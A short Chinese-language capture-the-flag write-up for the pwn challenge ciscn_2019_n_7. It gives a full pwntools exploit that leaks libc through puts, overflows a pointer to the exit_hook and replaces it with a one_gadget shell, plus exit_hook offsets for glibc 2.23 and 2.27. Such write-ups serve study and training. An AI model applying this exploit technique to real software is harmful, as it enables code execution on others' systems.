【exit hook】ciscn_2019_n_7
1.ida分析
-
输入666获得puts地址,计算libc偏移
-
输入name的时候,可以输入16个字节,但是只有前8个字节可用,后面8个字节是content的指针
-
2.思路
- 通过puts计算libc的偏移
- 溢出到content指针,修改为exit_hook的地址
- edit将exit_hook改为onegadget
3.exp
from pwn import *
p = remote('node3.buuoj.cn',28010)
#p = process('./ciscn_2019_n_7')
elf = ELF('./ciscn_2019_n_7')
libc = ELF('./libc-2.23.so')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context.log_level = 'debug'
def get_libc_base():
p.sendlineafter('Your choice-> \n','666')
p.recvuntil('0x')
puts = int(p.recvuntil('\n'),16)
log.success('puts==>'+hex(puts))
libc_base = puts - libc.sym['puts']
log.success('libc_base==>'+hex(libc_base))
return libc_base
def add(name):
p.sendlineafter('-> \n','1')
p.sendlineafter(': \n',str(0x10))
p.sendafter(':\n',str(name))
def edit(cont):
p.sendlineafter('-> \n','2')
p.sendlineafter(':\n','test')
p.sendlineafter(':\n',str(cont))
def exit():
p.sendlineafter('-> \n','a')
libc_base = get_libc_base()
exit_hook = libc_base + 0x5f0040 + 3848
one = libc_base + 0xf1147#0xf0364#0xf1207
add('b'*8 + p64(exit_hook))
edit(p64(one))
exit()
p.interactive()
3. exit_hook的地址
#在libc-2.23中
exit_hook = libc_base+0x5f0040+3848
exit_hook = libc_base+0x5f0040+3856
#在libc-2.27中
exit_hook = libc_base+0x619060+3840
exit_hook = libc_base+0x619060+3848